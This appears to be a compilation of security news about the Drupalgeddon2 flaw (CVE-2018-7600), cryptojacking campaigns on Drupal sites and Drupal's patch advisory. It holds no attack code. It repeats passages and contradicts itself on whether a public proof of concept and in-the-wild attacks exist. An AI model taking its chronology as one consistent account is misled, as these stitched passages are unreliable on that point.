Hackers have injected hundreds of websites running the Drupal content management system with malicious software used to mine the cryptocurrency monero.
This latest incident was uncovered by Troy Mursch, the security researcher behind the website Bad Packets Report. He wrote Saturday that more than 300 sites had been compromised by hackers who installed the browser mining software Coinhive, which mines the cryptocurrency monero, by exploiting a vulnerability in an outdated version of the Drupal content management system (CMS).
“Cryptojacking,” as similar attacks are called, has become a common problem in recent months. Whereas hackers used to favor ransom attacks – in which they would scramble victims’ data and demand ransoms in bitcoin or another cryptocurrency in order to decrypt it – they now increasingly infect websites with software that harnesses visitors’ computers to mine cryptocurrency on the attackers’ behalf.
Mursch told CoinDesk that while cryptojacking is not as overt as ransomware, it “continues to be a problem – especially for website operators.”
Affected sites include the San Diego Zoo, the National Labor Relations Board, the City of Marion, Ohio, the University of Aleppo, the Ringling College of Art and Design and the government of Chihuahua, Mexico. A full list of affected sites is available on this spreadsheet.
Visitors to affected websites may not even notice that their computers are running the cryptographic functions used to generate monero for hackers. The attacks slow users computers down, however, and can cause wear and tear on computers’ processors.
Not all Coinhive users are malicious, however. Salon, a news outlet, and UNICEF use the software to raise funds, but only run it with visitors’ permission.
After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.
The vulnerability was discovered by the Drupal developers Jasper Mattsson.
Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.
Drupal development team released the security update in time to address CVE-2018-7600.
After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.
A week after the release of the security update, the experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.
After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”
Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.
Over the weekend, several security firms observed threat actors have started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.
The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.
“Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit.” reads the analysis published by the SANS.
“Ever since then, we are seeing waves of exploit attempts hitting our honeypots.”
A thread on SANS ISC Infosec forums confirms that attackers are exploiting the Drupalgeddon2 flaw to install the XMRig Monero miner. Attackers also use to drop and execute other payloads, including a script to kill competing miners on the infected system.
According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts cryptocurrency miners and backdoors.
The experts associated one of the observed campaigns aimed to deliver XMRig with a cybercriminal gang that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.
According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempting to run drop cryptocurrency miners on the vulnerable systems.
“To this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets.” states the analysis published Imperva.
“Also, most of the attacks originated from the US (53%) and China (45%) “
While experts speculate that the number of attacks could continue to increase in the next weeks, site admins must update their CMS to Drupal 7.58 or Drupal 8.5.1.
The Drupal development team has fixed the drupalgeddon2 vulnerability that could be exploited by an attacker to take over a website.
A few days ago, Drupal Security Team confirmed that a “highly critical” vulnerability, tracked as CVE-2018-7600, affects Drupal 7 and 8 core and announced the availability of security updates on March 28th.
The vulnerability was discovered by the Drupal developers Jasper Mattsson.
Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates.
Now the Drupal development team has fixed the vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.
The Drupal CMS currently runs on over one million websites, it is the second most popular content management system behind WordPress.
Website administrators should immediately upgrade their sites to Drupal 7.58 or Drupal 8.5.1.
The flaw was dubbed Drupalgeddon2 after the CVE-2014-3704 Drupalgeddon security vulnerability that was discovered in 2014 that was exploited in numerous successful attacks in the wild.
The good news is that at the time there is no public proof-of-concept code available online.
The Drupal security team declared that it was not aware of any attacks exploiting the Drupalgeddon2 vulnerability in the wild.
“A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.” reads the security advisory published by Drupal.
“The security team has written an FAQ about this issue. Solution:
Upgrade to the most recent version of Drupal 7 or 8 core.
- If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
- If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)”
Patching the websites it essential, the popular expert Kevin Beaumont noticed that the Drupal homepage was taken down for half an hour to address the Drupalgeddon2.
The Drupal team also issued security patches for the 6.x versions that were discontinued in February 2016.
“This issue also affects Drupal 6. Drupal 6 is End of Life. For more information on Drupal 6 support please contact a D6LTS vendor.” continues the advisory.